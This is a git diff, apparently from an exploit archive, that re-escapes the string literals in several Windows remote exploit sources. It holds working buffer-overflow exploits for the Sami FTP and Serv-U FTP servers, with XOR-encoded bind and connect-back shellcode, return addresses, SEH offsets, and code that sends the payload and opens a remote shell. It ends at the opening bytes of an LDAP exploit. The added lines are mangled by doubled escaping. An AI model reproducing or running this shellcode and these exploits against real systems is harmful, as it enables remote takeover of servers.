-char MyShellCode[] =       // XOR by \x99\x99\x99\x99.
-"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
-"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
-                        "\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
-"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
-"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
-"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
-"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
-"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
-"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x98\x77\xF3\x93"
-"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\xAD\x16\x71\x09"
-"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x18\x75\x09\x98"
-"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\xCE\xDE\xCE\xDE"
-"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\x9A\x90\x10"
-"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x8D\xCE\xCF\xCA"
-"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3"
-"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10"
-"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\xDD\xBD\x89\xCD"
-"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\xC8\x66\xCC\xA9"
-"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\xCE\x66\xCC\x95"
-"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD"
-"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x7A\xAB\xD0\x12"
-"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\xED\x9E\x58\x56"
-"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x98\x72"
-"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x98\x71\x72\x9B"
-"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";
+char MyShellCode[] =       // XOR by \\x99\\x99\\x99\\x99.
+\"\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x31\\xC9\\xB1\\x59\\x81\\x73\\x17\\x99\\x99\"
+\"\\x99\\x99\\x83\\xEB\\xFC\\xE2\" // Bind ShellCode port 777.
+                        \"\\xF4\\x71\\xA1\\x99\\x99\\x99\\xDA\\xD4\\xDD\\x99\"
+\"\\x7E\\xE0\\x5F\\xE0\\x7C\\xD0\\x1F\\xD0\\x3D\\x34\\xB7\\x70\\x3D\\x83\\xE9\\x5E\"
+\"\\x40\\x90\\x6C\\x34\\x52\\x74\\x65\\xA2\\x17\\xD7\\x97\\x75\\xE7\\x41\\x7B\\xEA\"
+\"\\x34\\x40\\x9C\\x57\\xEB\\x67\\x2A\\x8F\\xCE\\xCA\\xAB\\xC6\\xAA\\xAB\\xB7\\xDD\"
+\"\\xD5\\xD5\\x99\\x98\\xC2\\xCD\\x10\\x7C\\x10\\xC4\\x99\\xF3\\xA9\\xC0\\xFD\\x12\"
+\"\\x98\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xC1\\x91\\x72\\x95\\x14\\xCE\\xB5\"
+\"\\xC8\\xCB\\x66\\x49\\x10\\x5A\\xC0\\x72\\x89\\xF3\\x91\\xC7\\x98\\x77\\xF3\\x93\"
+\"\\xC0\\x12\\xE4\\x99\\x19\\x60\\x9F\\xED\\x7D\\xC8\\xCA\\x66\\xAD\\x16\\x71\\x09\"
+\"\\x99\\x99\\x99\\xC0\\x10\\x9D\\x17\\x7B\\x72\\xA8\\x66\\xFF\\x18\\x75\\x09\\x98\"
+\"\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCC\\xB9\\xCE\\xCE\\xCE\\xCE\\xDE\\xCE\\xDE\"
+\"\\xCE\\x66\\xCC\\x85\\x10\\x5A\\xA8\\x66\\xCE\\xCE\\xF1\\x9B\\x99\\x9A\\x90\\x10\"
+\"\\x7F\\xF3\\x89\\xCF\\xCA\\x66\\xCC\\x81\\xCE\\xCA\\x66\\xCC\\x8D\\xCE\\xCF\\xCA\"
+\"\\x66\\xCC\\x89\\x10\\x5B\\xFF\\x18\\x75\\xCD\\x99\\x14\\xA5\\xBD\\xA8\\x59\\xF3\"
+\"\\x8C\\xC0\\x6A\\x32\\x10\\x4E\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA4\\x10\"
+\"\\xE5\\xBD\\xD1\\x10\\xE5\\xBD\\xD5\\x10\\xE5\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\xCD\"
+\"\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\xEC\\x99\\xC8\\x66\\xCC\\xA9\"
+\"\\x10\\x78\\xF1\\x66\\x66\\x66\\x66\\x66\\xA8\\x66\\xCC\\xB5\\xCE\\x66\\xCC\\x95\"
+\"\\x66\\xCC\\xB1\\xCA\\xCC\\xCF\\xCE\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\"
+\"\\x9C\\xE1\\x98\\x73\\x12\\xD3\\x81\\x12\\xC3\\xB9\\x98\\x72\\x7A\\xAB\\xD0\\x12\"
+\"\\xAD\\x12\\x98\\x77\\xA8\\x66\\x65\\xA8\\x59\\x35\\xA1\\x79\\xED\\x9E\\x58\\x56\"
+\"\\x94\\x98\\x5E\\x72\\x6B\\xA2\\xE5\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x98\\x72\"
+\"\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x98\\x72\\x12\\x9D\\x12\\x98\\x71\\x72\\x9B\"
+\"\\xA8\\x59\\x10\\x73\\xC6\\xC7\\xC4\\xC2\\x5B\\x91\\x99\";
 
 static char PayLoad[1329];  
 
@@ -39,28 +39,28 @@ int szNOP1, szNOP2;
 int Nop; 
 
 // Jump ESP by library User32 on Win2000 SP4 fr..
-char JmpESP[] = "\x0C\xED\xE3\x77";
+char JmpESP[] = \"\\x0C\\xED\\xE3\\x77\";
 // Flag ID server Sami FTP.
-char TargetFlag[] = "220-\r\n220 Features p a .";
+char TargetFlag[] = \"220-\\r\\n220 Features p a .\";
 char RecvBuff[200];
 
 void usage(){
-  cout<<" "< 3 ) ){usage();return -1;} 
 
 if( argc > 1 ){ 
-  cout<<"argv[1]"<<"\t"<
 #include 
 
-#pragma comment(lib, "ws2_32")
+#pragma comment(lib, \"ws2_32\")
 
 // for bind shellcode
 #define BIND_OFFSET		91
@@ -37,8 +37,8 @@
 #define SEH_OFFSET		0x193	//v3.0.0.20~v4.1.0.11
 //#define	SEH_OFFSET		0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
 #define MAX_LEN			2048
-#define JMP_OVER		"\xeb\x06\xeb\x06"
-#define	VERSION			"1.0"
+#define JMP_OVER		\"\\xeb\\x06\\xeb\\x06\"
+#define	VERSION			\"1.0\"
 
 struct
 {
@@ -46,16 +46,16 @@ struct
 	char	*szDescription;
 }targets[] =
 {
-	{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K/XP  ALL"},	//for all GB win2000 and winxp
-// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K     SP3/SP4"},	//wsock32.dll jmp ebx addr
-// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11  GB     XP     SP0/SP1"},	//wsock32.dll jmp ebx addr
-// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11  GB/BG  2K     SP4"},	//user32.dll jmp ebx addr
-// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K/XP  ALL"},	//for all BG win2000 and winxp	
-// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K     SP4"},	//setupapi.dll jmp ebx addr
-// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11  KR     2K     SP4"},	//setupapi.dll jmp ebx addr
-// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11  EN     2K     SP4"},	//setupapi.dll jmp ebx addr
-// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11  EN     XP     SP1"},
-// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},         
+	{0x7ffa4a1b,\"Serv-U v3.0.0.20~v4.1.0.11  GB     2K/XP  ALL\"},	//for all GB win2000 and winxp
+// {0x74FD69A9,\"Serv-U v3.0.0.20~v4.1.0.11  GB     2K     SP3/SP4\"},	//wsock32.dll jmp ebx addr
+// {0x71a469ad,\"Serv-U v3.0.0.20~v4.1.0.11  GB     XP     SP0/SP1\"},	//wsock32.dll jmp ebx addr
+// {0x77e45f17,\"Serv-U v3.0.0.20~v4.1.0.11  GB/BG  2K     SP4\"},	//user32.dll jmp ebx addr
+// {0x7ffa2186,\"Serv-U v3.0.0.20~v4.1.0.11  BG     2K/XP  ALL\"},	//for all BG win2000 and winxp	
+// {0x6dec6713,\"Serv-U v3.0.0.20~v4.1.0.11  BG     2K     SP4\"},	//setupapi.dll jmp ebx addr
+// {0x6DEE6713,\"Serv-U v3.0.0.20~v4.1.0.11  KR     2K     SP4\"},	//setupapi.dll jmp ebx addr
+// {0x77886713,\"Serv-U v3.0.0.20~v4.1.0.11  EN     2K     SP4\"},	//setupapi.dll jmp ebx addr
+// {0x76b42a3a,\"Serv-U v3.0.0.20~v4.1.0.11  EN     XP     SP1\"},
+// {0x12345678,\"Serv-U v3.0.0.20~v4.1.0.11\"},         
 },v;
 
 
@@ -63,74 +63,74 @@ unsigned char	*szSend[4];
 unsigned char	szCommand[MAX_LEN];
 char		szDirectory[0x100];
 
-// 28 bytes decode by lion, don't change this.
+// 28 bytes decode by lion, don\'t change this.
 unsigned char decode[]=
-"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
-"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";
+\"\\xBE\\x6D\\x69\\x6F\\x6E\\x4E\\xBF\\x6D\\x69\\x30\\x6E\\x4F\\x43\\x39\\x3B\\x75\"
+\"\\xFB\\x4B\\x80\\x33\\x93\\x39\\x73\\xFC\\x75\\xF7\\xFF\\xD3\";
 
-// Shellcode start sign, use for decode, don't change this.
+// Shellcode start sign, use for decode, don\'t change this.
 unsigned char sc_start[]=
-"lion"; 
+\"lion\"; 
 
-// Shellcode end sign, use for decode, don't change this.
+// Shellcode end sign, use for decode, don\'t change this.
 unsigned char sc_end[]=
-"li0n"; 
+\"li0n\"; 
 
 // 311 bytes bind shellcode by lion (xor with 0x93)
 unsigned char sc[]=
-"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
-"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
-"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
-"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
-"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
-"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
-"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
-"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
-"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
-"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
-"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
-"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
-"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
-"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
-"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
-"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
-"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
-"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
-"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
-"\xDA\x15\xDA\x74\xEA\x55\xEA";
+\"\\x7A\\x96\\x92\\x93\\x93\\xCC\\xF7\\x32\\xA3\\x93\\x93\\x93\\x18\\xD3\\x9F\\x18\"
+\"\\xE3\\x8F\\x3E\\x18\\xFB\\x9B\\x18\\x64\\xF9\\x97\\xCA\\x7B\\x36\\x93\\x93\\x93\"
+\"\\x71\\x6A\\xFB\\xA0\\xA1\\x93\\x93\\xFB\\xE4\\xE0\\xA1\\xCC\\xC7\\x6C\\x85\\x18\"
+\"\\x7B\\xF9\\x95\\xCA\\x7B\\x1F\\x93\\x93\\x93\\x71\\x6A\\x12\\x7F\\x03\\x92\\x93\"
+\"\\x93\\xC7\\xFB\\x92\\x92\\x93\\x93\\x6C\\xC5\\x83\\xC3\\xC3\\xC3\\xC3\\xF9\\x92\"
+\"\\xF9\\x91\\x6C\\xC5\\x87\\x18\\x4B\\x54\\x94\\x91\\x93\\x93\\xA6\\xA0\\x53\\x1A\"
+\"\\xD4\\x97\\xF9\\x83\\xC4\\xC0\\x6C\\xC5\\x8B\\xF9\\x92\\xC0\\x6C\\xC5\\x8F\\xC3\"
+\"\\xC3\\xC0\\x6C\\xC5\\xB3\\x18\\x4B\\xA0\\x53\\xFB\\xF0\\xFE\\xF7\\x93\\x1A\\xF5\"
+\"\\xA3\\x10\\x7F\\xC7\\x18\\x6F\\xF9\\x87\\xCA\\x1A\\x97\\x1C\\x71\\x68\\x55\\xD4\"
+\"\\x83\\xD7\\x6D\\xD4\\xAF\\x6D\\xD4\\xAE\\x1A\\xCC\\xDB\\x1A\\xCC\\xDF\\x1A\\xCC\"
+\"\\xC3\\x1E\\xD7\\xB7\\x83\\xC4\\xC3\\xC2\\xC2\\xC2\\xF9\\x92\\xC2\\xC2\\x6C\\xE5\"
+\"\\xA3\\xC2\\x6C\\xC5\\x97\\x18\\x5F\\xF9\\x6C\\x6C\\xA2\\x6C\\xC5\\x9B\\xC0\\x6C\"
+\"\\xC5\\xB7\\x6C\\xC5\\x9F\\xC2\\xC5\\x18\\xE6\\xAF\\x18\\xE7\\xBD\\xEB\\x90\\x66\"
+\"\\xC5\\x18\\xE5\\xB3\\x90\\x66\\xA0\\x5A\\xDA\\xD2\\x3E\\x90\\x56\\xA0\\x48\\x9C\"
+\"\\x2D\\x83\\xA9\\x45\\xE7\\x9B\\x52\\x58\\x9E\\x90\\x49\\xD3\\x78\\x62\\xA8\\x8C\"
+\"\\xE6\\x74\\xCD\\x18\\xCD\\xB7\\x90\\x4E\\xF5\\x18\\x9F\\xD8\\x18\\xCD\\x8F\\x90\"
+\"\\x4E\\x18\\x97\\x18\\x90\\x56\\x38\\xCD\\xCA\\x50\\x7B\\x65\\x6D\\x6C\\x6C\\x1D\"
+\"\\xDD\\x9D\\x7F\\xE1\\x6D\\x20\\x85\\x3E\\x4A\\x96\\x5D\\xED\\x4B\\x71\\xE0\\x58\"
+\"\\x7E\\x6F\\xA8\\x4A\\x9A\\x66\\x3E\\x37\\x89\\xE3\\x54\\x37\\x3E\\xBD\\x7A\\x76\"
+\"\\xDA\\x15\\xDA\\x74\\xEA\\x55\\xEA\";
 
 // 294 bytes connectback shellcode by lion (xor with 0x93)
 unsigned char cbsc[]=
-"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
-"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
-"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
-"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
-"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
-"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
-"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
-"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
-"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
-"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
-"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
-"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
-"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
-"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
-"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
-"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
-"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
-"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
-"\x39\xF3\x74\xEA\x55\xEA";
+\"\\x7A\\x6F\\x93\\x93\\x93\\xCC\\xF7\\x32\\xA3\\x93\\x93\\x93\\x18\\xD3\\x9F\\x18\"
+\"\\xE3\\x8F\\x3E\\x18\\xFB\\x9B\\x18\\x64\\xF9\\x97\\xCA\\x7B\\x0F\\x93\\x93\\x93\"
+\"\\x71\\x6A\\xFB\\xA0\\xA1\\x93\\x93\\xFB\\xE4\\xE0\\xA1\\xCC\\xC7\\x6C\\x85\\x18\"
+\"\\x7B\\xF9\\x97\\xCA\\x7B\\x10\\x93\\x93\\x93\\x71\\x6A\\x12\\x7F\\x03\\x92\\x93\"
+\"\\x93\\xC7\\xFB\\x92\\x92\\x93\\x93\\x6C\\xC5\\x83\\xC3\\xC3\\xC3\\xC3\\xF9\\x92\"
+\"\\xF9\\x91\\x6C\\xC5\\x87\\x18\\x4B\\xFB\\xEC\\x93\\x93\\x92\\xFB\\x91\\x93\\x93\"
+\"\\xA6\\x18\\x5F\\xF9\\x83\\xC2\\xC0\\x6C\\xC5\\x8B\\x16\\x53\\xE6\\xD8\\xA0\\x53\"
+\"\\xFB\\xF0\\xFE\\xF7\\x93\\x1A\\xF5\\xA3\\x10\\x7F\\xC7\\x18\\x6F\\xF9\\x83\\xCA\"
+\"\\x1A\\x97\\x1C\\x71\\x68\\x55\\xD4\\x83\\xD7\\x6D\\xD4\\xAF\\x6D\\xD4\\xAE\\x1A\"
+\"\\xCC\\xDB\\x1A\\xCC\\xDF\\x1A\\xCC\\xC3\\x1E\\xD7\\xB7\\x83\\xC4\\xC3\\xC2\\xC2\"
+\"\\xC2\\xF9\\x92\\xC2\\xC2\\x6C\\xE5\\xA3\\xC2\\x6C\\xC5\\x97\\x18\\x5F\\xF9\\x6C\"
+\"\\x6C\\xA2\\x6C\\xC5\\x9B\\xC0\\x6C\\xC5\\x8F\\x6C\\xC5\\x9F\\xC2\\xC5\\x18\\xE6\"
+\"\\xAF\\x18\\xE7\\xBD\\xEB\\x90\\x66\\xC5\\x18\\xE5\\xB3\\x90\\x66\\xA0\\x5A\\xDA\"
+\"\\xD2\\x3E\\x90\\x56\\xA0\\x48\\x9C\\x2D\\x83\\xA9\\x45\\xE7\\x9B\\x52\\x58\\x9E\"
+\"\\x90\\x49\\xD3\\x78\\x62\\xA8\\x8C\\xE6\\x74\\xCD\\x18\\xCD\\xB7\\x90\\x4E\\xF5\"
+\"\\x18\\x9F\\xD8\\x18\\xCD\\x8F\\x90\\x4E\\x18\\x97\\x18\\x90\\x56\\x38\\xCD\\xCA\"
+\"\\x50\\x7B\\x6C\\x6D\\x6C\\x6C\\x1D\\xDD\\x9D\\x7F\\xE1\\x6D\\x20\\x85\\x3E\\x4A\"
+\"\\x96\\x5D\\xED\\x4B\\x71\\xE0\\x58\\x7E\\x6F\\xA8\\x4A\\x9A\\x66\\x3E\\x7F\\x6A\"
+\"\\x39\\xF3\\x74\\xEA\\x55\\xEA\";
 
 void usage(char *p)
 {
 	int	i;
-	printf( "Usage:\t%s\t<-i ip> <-t type>\n"
-		"\t\t[-u user] [-p pass] [-d dir]\n"
-		"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
-		"[type]:\n" , p);	
+	printf( \"Usage:\\t%s\\t<-i ip> <-t type>\\n\"
+		\"\\t\\t[-u user] [-p pass] [-d dir]\\n\"
+		\"\\t\\t[-f ftpport] [-c cbhost] [-s shellport]\\n\\n\"
+		\"[type]:\\n\" , p);	
 	for(i=0;i=sizeof(targets)/sizeof(v)) )
 	{
 		usage(argv[0]);
-		printf("[-] Invalid type.\n");
+		printf(\"[-] Invalid type.\\n\");
 		return;
 	}
 
 	if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
 	{
 		usage(argv[0]);
-		printf("[-] Invalid port.\n");
+		printf(\"[-] Invalid port.\\n\");
 		return;
 	}
 	
-	_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
-	user[sizeof(user)-1]='\0';
-	_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
-	pass[sizeof(pass)-1]='\0';
+	_snprintf(user, sizeof(user)-1, \"USER %s\\r\\n\", pUser);
+	user[sizeof(user)-1]=\'\\0\';
+	_snprintf(pass, sizeof(pass)-1, \"PASS %s\\r\\n\", pPass);
+	pass[sizeof(pass)-1]=\'\\0\';
 	szSend[0] = user;	//user
 	szSend[1] = pass;	//pass	
 	szSend[2] = penetrate;	//pentrate
@@ -306,21 +306,21 @@ void main(int argc, char **argv)
 		strncpy(cbHost2, cbHost, 20);
 		for(i=0;i= sizeof(szCommand))
 	{
-		printf("[-] stack buffer overflow.\n");
+		printf(\"[-] stack buffer overflow.\\n\");
 		return;
 	}
 	
-//	printf("send size %d:%s", strlen(szCommand), szCommand);
+//	printf(\"send size %d:%s\", strlen(szCommand), szCommand);
 	
 	__try
 	{
 		if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
 		{
-			printf("[-] WSAStartup error:%d\n", WSAGetLastError());
+			printf(\"[-] WSAStartup error:%d\\n\", WSAGetLastError());
 			__leave;
 		}
 
 		s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 		if(s == INVALID_SOCKET)
 		{
-			printf("[-] Create socket failed:%d",GetLastError());
+			printf(\"[-] Create socket failed:%d\",GetLastError());
 			__leave;
 		}
 
@@ -399,10 +399,10 @@ void main(int argc, char **argv)
 		iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
 		if(iErr == SOCKET_ERROR)
 		{
-			printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
+			printf(\"[-] Connect to %s:%d error:%d\\n\", ip, iPort, GetLastError());
 			__leave;
 		}
-		printf("[+] Connect to %s:%d success.\n", ip, iPort);
+		printf(\"[+] Connect to %s:%d success.\\n\", ip, iPort);
 		
 		if(bCb)
 		{
@@ -421,15 +421,15 @@ void main(int argc, char **argv)
 
 			if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
 			{
-				printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
-				printf("[-] You must run nc get the shell.\n");
+				printf(\"[-] Bind port on %s:%d error.\\n\", cbHost, shport);
+				printf(\"[-] You must run nc get the shell.\\n\");
 				bLocal = FALSE;
 				//closesocket(s2);
 				//__leave;
 			}
 			else
 			{	
-				printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
+				printf(\"[+] Bind port on %s:%d success.\\n\", cbHost, shport);
 				listen(s2, 1); 
 			}
 		}
@@ -440,51 +440,51 @@ void main(int argc, char **argv)
 			iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
 			if(iErr == SOCKET_ERROR)
 			{
-				printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
+				printf(\"[-] Recv buffer error:%d.\\n\", WSAGetLastError());
 				__leave;
 			}
-			printf("[+] Recv: %s", szRecvBuff);
+			printf(\"[+] Recv: %s\", szRecvBuff);
 			
-			if(szRecvBuff[0] == '5')
+			if(szRecvBuff[0] == \'5\')
 			{
-				printf("[-] Server return a error Message.\r\n");
+				printf(\"[-] Server return a error Message.\\r\\n\");
 				__leave;
 			}
 
 			iErr = send(s, szSend[i], strlen(szSend[i]),0);
 			if(iErr == SOCKET_ERROR)
 			{
-				printf("[-] Send buffer error:%d.\n", WSAGetLastError());
+				printf(\"[-] Send buffer error:%d.\\n\", WSAGetLastError());
 				__leave;
 			}
 
 			if(i==sizeof(szSend)/sizeof(szSend[0])-1)
-				printf("[+] Send shellcode %d bytes.\n", iErr);
+				printf(\"[+] Send shellcode %d bytes.\\n\", iErr);
 			else
-				printf("[+] Send: %s", szSend[i]);
+				printf(\"[+] Send: %s\", szSend[i]);
 		}
 
-		printf("[+] If you don't have a shell it didn't work.\n");
+		printf(\"[+] If you don\'t have a shell it didn\'t work.\\n\");
 
 		if(bCb)
 		{
 			if(bLocal)
 			{
-				printf("[+] Wait for shell...\n");
+				printf(\"[+] Wait for shell...\\n\");
 			
 				len = sizeof(client);
 				s3 = accept(s2, (struct sockaddr*)&client, &len); 
 				if(s3 != INVALID_SOCKET) 
 				{ 
-	printf("[+] Exploit success! Good luck! :)\n");
-	printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
+	printf(\"[+] Exploit success! Good luck! :)\\n\");
+	printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
 					shell(s3);
 				}
 			}	
 		}
 		else
 		{
-			printf("[+] Connect to shell...\n");
+			printf(\"[+] Connect to shell...\\n\");
 			
 			Sleep(1000);
 			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
@@ -495,12 +495,12 @@ void main(int argc, char **argv)
 			ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
 			if(ret!=0)
 			{
-				printf("[-] Exploit seem failed.\n");
+				printf(\"[-] Exploit seem failed.\\n\");
 				__leave;
 			}
 			
-	printf("[+] Exploit success! Good luck! :)\n");
-	printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
+	printf(\"[+] Exploit success! Good luck! :)\\n\");
+	printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
 			shell(s2);
 		}
 		
diff --git a/platforms/windows/remote/157.c b/platforms/windows/remote/157.c
index 2fd4bc0cf..17b0d4331 100755
--- a/platforms/windows/remote/157.c
+++ b/platforms/windows/remote/157.c
@@ -17,40 +17,40 @@
 #include 
 #include 
 
-#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, \"ws2_32.lib\")
 
-char *WIN2KEN = "\xc4\x2a\x02\x75";
-char *WIN2KPG = "\xc4\x2a\xf9\x74";
-char *WINXPSP1G = "\xfe\x63\xa1\x71";
+char *WIN2KEN = \"\\xc4\\x2a\\x02\\x75\";
+char *WIN2KPG = \"\\xc4\\x2a\\xf9\\x74\";
+char *WINXPSP1G = \"\\xfe\\x63\\xa1\\x71\";
 
-#define jumper "\xeb\x06\x4a\x43"
+#define jumper \"\\xeb\\x06\\x4a\\x43\"
 
-char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";
